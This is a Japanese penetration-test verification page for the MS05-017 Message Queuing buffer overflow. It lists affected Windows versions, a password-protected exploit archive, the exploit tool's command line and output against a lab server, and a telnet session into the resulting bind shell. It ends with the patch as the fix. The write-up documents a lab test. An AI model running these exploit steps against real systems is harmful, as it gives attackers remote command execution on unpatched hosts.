MS05-017:メッセージキューの脆弱性により、コードが実行される

MS05-017:メッセージキューの脆弱性により、コードが実行される

更新履歴

2006/02/17　初版
- Author kikuzou

概要

メッセージキューの脆弱性に対するExploitコード
デフォルトインストールされないサービスなので、影響は少ないと思われる。

影響を受けるシステム

Microsoft Windows 2000 Service Pack 3 および Microsoft Windows 2000 Service Pack 4
Microsoft Windows XP Service Pack 1
Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium)
Microsoft Windows 98 および Microsoft Windows 98 Second Edition (SE) ‐

影響を受けないシステム

Microsoft Windows XP Service Pack 2
Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium)
Microsoft Windows Server 2003 および Windows Server 2003 Service Pack 1
Microsoft Windows Server 2003 for Itanium-based Systems
Microsoft Windows Millennium Edition (ME)

添付ファイル

files	password
ms05-017.zip	pen-test

参考URL

Microsoft::メッセージキューの脆弱性により、コードが実行される

Exploitの検証

検証環境

Windows2000 Server SP4 日本語版

検証結果

攻撃先サーバ
- IPアドレス：172.31.1.100
- ポート：2103
- コンピュータ名：win2000srv
- バインドポート：12345

C:\>HOD-ms05017-msmq-expl.exe

      (MS05-017) Message Queuing Buffer Overflow Vulnerability

             Copyright (c) 2004-2005 .: houseofdabus :.


HOD-ms05017-msmq-expl.exe <host> <port> <netbios name> <bind port> [count]

MSMQ ports: 2103, 2105, 2107
count - number of packets. for Win2k Server/AdvServer = 6-8


C:\>
C:\>HOD-ms05017-msmq-expl.exe 172.31.1.100 2103 win2000srv 12345 8　※ポート番号は 2103,2105,2107 のいずれか

      (MS05-017) Message Queuing Buffer Overflow Vulnerability

             Copyright (c) 2004-2005 .: houseofdabus :.



[*] Connecting to 172.31.1.100:2103 ... OK
[*] Attacking........... OK

C:\>
C:\>telnet 172.31.1.100 12345

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>

C:\WINNT\system32>

C:\WINNT\system32>

C:\WINNT\system32>hostname
hostname
win2000srv

C:\WINNT\system32>exit
exit

対処方法

MS05-017 パッチの適用 (Windows Update の実施)